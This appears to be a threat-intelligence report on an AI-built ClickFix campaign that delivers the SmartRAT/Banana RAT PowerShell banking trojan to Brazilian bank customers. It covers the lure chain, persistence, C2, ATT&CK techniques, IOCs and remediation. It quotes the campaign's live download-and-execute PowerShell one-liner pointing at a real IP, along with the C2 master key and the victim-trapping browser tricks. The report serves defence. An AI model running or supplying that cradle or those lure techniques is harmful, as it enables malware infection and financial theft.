Threat reportMalwareTL-2026-0841
AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT PowerShell Banking Trojan Targeting Brazilian Financial Sector
AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT (TL-2026-0841), also tracked as SmartRAT, is a high-severity malware campaign, first published 2026-06-17 and last reviewed 2026-08-31. It is attributed to SHADOW-WATER-063 (Brazil) with medium confidence, affects Microsoft Windows (PowerShell-enabled endpoints), maps to 36 MITRE ATT&CK techniques (T1005, T1008, T1010), and is covered by 9 detection rules and 30 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 36MITRE ATT&CK
- Actors
- 1SHADOW-WATER-063
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 30Indicators of compromise
Key facts for TL-2026-0841
- Threat ID
- TL-2026-0841
- Also known as
- SmartRAT, Banana RAT, SMART_V25
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- SHADOW-WATER-063
- Attribution confidence
- MEDIUM
- Nation-state nexus
- Brazil
- Motivation
- FINANCIAL
- Target sectors
- financial, banking, payments, cryptocurrency
- Target regions
- Brazil, South America, Latin America
- Detection rules
- 9
- Indicators of compromise
- 30
- Updates
- 2026-08-31 · revalidated 1× · latest source
Malware and tooling in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
Malware and tooling: Banana RAT, SmartRAT
How AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT works
A financially motivated actor (tracked by Trend Micro as SHADOW-WATER-063) used AI-built typosquatting sites impersonating Brazilian banks and a ClickFix lure (fake Cloudflare CAPTCHA followed by a fullscreen fake BSOD) to coerce victims into running a malicious PowerShell command via Win+R. The chain delivers SmartRAT (internal string SMART_V25; aka Banana RAT) — a PowerShell/C# banking RAT featuring AES-CBC C2, multi-path persistence as MicrosoftEdgeUpdateCore, real-time screen streaming, overlay injection, and PIX/QR transaction manipulation against Brazilian banks, payment platforms, and crypto exchanges.
Zscaler ThreatLabz and Trend Micro independently documented an active banking-fraud campaign against the Brazilian financial sector first observed in March 2026. Threat actors leveraged AI website-building tools to rapidly stand up convincing typosquatting domains (e.g. cartaobb.com impersonating Banco do Brasil's Cartao BB, crefisa.online, vfsgloball.net). Source-code artifacts — templated AI-style section-header comments and a C2 panel containing verbose explanatory comments and emoticons — indicate large-language-model assistance in both the lure pages and the operator backend.
The delivery uses the ClickFix social-engineering technique. A victim landing on the AI-generated page is shown a fake Cloudflare CAPTCHA on a page that disables DevTools and clears the console. Clicking the CAPTCHA forces the browser fullscreen and renders a fake Windows BSOD/system-recovery prompt. Anti-escape logic (navigator.keyboard.lock(), capture-phase keydown handlers, and window.focus() loops) traps the user while still permitting Win+R, Ctrl+V, and Enter. A PowerShell one-liner is silently placed on the clipboard: powershell "$k8='http://64.95.13.238/st.txt';iex(irm $k8)" with randomized trailing whitespace to defeat hash-based blocking.
Execution retrieves st.txt, which hides its console via ShowWindow(), downloads payload.php from the same host, saves it under the decoy name msedge.txt, and runs it via ScriptBlock::Create(). payload.php Base64-decodes a hardcoded AES key/IV and performs AES-CBC decryption of an embedded blob to reconstruct SmartRAT (identified by the embedded string SMART_V25), which then XOR-decrypts its C2 configuration. The Trend Micro reporting describes a FastAPI-based polymorphic crypter generating 100-200 hash-unique builds per campaign and nine custom PowerShell obfuscation layers.
SmartRAT establishes persistence as MicrosoftEdgeUpdateCore across three privilege paths: a logon-triggered Scheduled Task pointing at %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt (UAC success), an HKCU Run key fallback (UAC denied), and a SYSTEM-level Windows Service compiled in-memory via csc.exe and launched with DuplicateTokenEx / CreateProcessAsUser (elevated). A watchdog respawns every 5 seconds. C2 uses raw TCP on port 51888 plus HTTP (port 80) and TLS (port 443) channels, with AES-CBC (key = SHA-256 of master key iuhbdaubdvauygd5562$3@##$r, HMAC-SHA256 integrity, fresh per-message IV in ivHex:ciphertextHex format) and a binary message-framing protocol. The RAT delivers real-time screen streaming, operator input control, banking-aware overlay injection, QR/PIX transaction tampering, and keylogging, watching window titles for Santander, Bradesco, Itau, Caixa, Banco do Brasil, Nubank, Inter, C6 Bank, Safra, BTG, Sicoob, Sicredi, Mercado Pago, PicPay, PagSeguro, PayPal, Binance, and Mercado Bitcoin.
MITRE ATT&CK techniques used in TL-2026-0841
Collection
T1005 Data from Local System; T1113 Screen Capture; T1185 Browser Session Hijacking
Command and Control
T1008 Fallback Channels; T1071.001 Web Protocols; T1105 Ingress Tool Transfer; T1571 Non-Standard Port; T1573.001 Symmetric Cryptography; T1659 Content Injection
Discovery
T1010 Application Window Discovery; T1057 Process Discovery; T1082 System Information Discovery
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1036.005 Match Legitimate Resource Name or Location; T1070.004 File Deletion; T1140 Deobfuscate/Decode Files or Information; T1564.003 Hidden Window; T1620 Reflective Code Loading
Exfiltration
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Persistence
T1053.005 Scheduled Task; T1543.003 Windows Service; T1547.001 Registry Run Keys / Startup Folder
Credential Access
Execution
T1059.001 PowerShell; T1204.001 Malicious Link; T1204.004 User Execution: Malicious Copy and Paste; T1569.002 Service Execution
Privilege Escalation
T1134.001 Token Impersonation/Theft; T1134.002 Create Process with Token; T1548.002 Bypass User Account Control
Initial Access
T1189 Drive-by Compromise; T1566 Phishing; T1566.002 Spearphishing Link
Resource Development
T1583.001 Acquire Infrastructure: Domains
Impact
Affected products and versions in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
- Microsoft — Windows (PowerShell-enabled endpoints)
Vulnerable versions: Windows 10; Windows 11; Windows Server
Remediation for AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
Immediate actions
- Block C2 IPs 64.95.13.238, 162.141.111.227, and 24.199.90.58 and typosquat/C2 domains cartaobb.com, crefisa.online, vfsgloball.net, windowsupdate-cdn.com, c.windowsupdate-cdn.com, c.windowsk-cdn.com at the perimeter and DNS resolver
- Block outbound TCP to port 51888; alert on raw-socket egress to non-standard high ports
- Hunt for the scheduled task, Run key, and service all named MicrosoftEdgeUpdateCore and for files under %APPDATA%\Microsoft\Diagnosis\ETW\
Workarounds
- Block clipboard-injected command execution by restricting PowerShell for standard users
- Browser policy to prevent untrusted sites from entering fullscreen / locking the keyboard
Longer-term hardening
- Deploy EDR with PowerShell Script Block Logging (Event ID 4104) and AMSI to catch iex(irm ...) download cradles and in-memory csc.exe compilation
- Disable or restrict the Win+R Run dialog via GPO (NoRun) for non-technical user populations
- User-awareness training on ClickFix: never paste-and-run clipboard commands from a webpage prompt
- Enforce constrained-language-mode PowerShell and application allowlisting
Weaknesses (CWE) in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
Timeline of AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
- Actor stands up AI-built typosquatting domains (cartaobb.com, crefisa.online, vfsgloball.net) and Windows-Update-masquerading C2 (windowsupdate-cdn.com); source-code artifacts (templated AI section-header comments, commented/emoticon-laden C2 panel) indicate large-language-model assistance in both lure pages and operator backend.
- Zscaler ThreatLabz first observes typosquatting domains hosting malicious AI-generated content impersonating Brazilian banks (e.g. cartaobb.com).
- ClickFix lure chain (fake Cloudflare CAPTCHA + fullscreen fake BSOD) actively delivering SmartRAT to Brazilian banking victims via Win+R PowerShell download cradle.
- SmartRAT builds (string SMART_V25) observed performing MicrosoftEdgeUpdateCore multi-path persistence, in-memory csc.exe service compilation, and raw-TCP AES-CBC C2 on port 51888 with HTTP/TLS fallback channels.
- SOC Prime publishes Sigma detection content for the SHADOW-WATER-063 Banana RAT campaign (build-server-to-banking-fraud chain) for SOC consumption.
- Trend Micro publishes analysis attributing the Banana RAT operation to financially motivated actor SHADOW-WATER-063, detailing the FastAPI polymorphic crypter (100-200 hash-unique builds per campaign) and nine custom PowerShell obfuscation layers.
- Secondary reporting (HackRead, CyberSecurityNews) describes NF-e invoice and WhatsApp lures delivering Banana RAT via malicious batch files to customers at 16 major Brazilian banks.
- Threat ingested into Threadlinqs Intelligence as TL-2026-0841; SmartRAT and Banana RAT correlated as the same PowerShell banking RAT family.
- Zscaler ThreatLabz publishes the SmartRAT (SMART_V25) technical writeup confirming the AI-generated ClickFix delivery, AES-CBC C2 on port 51888, and MicrosoftEdgeUpdateCore persistence.
- Security Boulevard and Cybersecurity News republish and corroborate the Zscaler ThreatLabz SmartRAT findings and IOCs.
Update history for TL-2026-0841
- 2026-08-31 — AI-Generated ClickFix Campaign Delivers SmartRAT Banking Trojan Targeting Brazil: What changed No severity/exploitability/status escalation — core facts (IOCs, PowerShell cradle, persistence mechanism) are corroborated, not contradicted. The report adds technical depth: the operator C2 panel's identity and a client-side-
Sources cited for AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT
- ClickFix Campaign Generated by AI Delivers SmartRAT
- Inside SHADOW-WATER-063's Banana RAT: From Build Server to Banking Fraud
- Inside SHADOW-WATER-063's Banana RAT (SOC Prime analysis)
- Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks
- Hackers Use NF-e Invoice Lures to Deliver Banana RAT Through Malicious Batch Files
- MITRE ATT&CK T1204.001 User Execution: Malicious Link
Detection coverage for TL-2026-0841
As of 2026-08-31, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0841 across Splunk SPL, Microsoft KQL and Sigma, covering 30 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.
Community OSINT corroboration for TL-2026-0841
3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.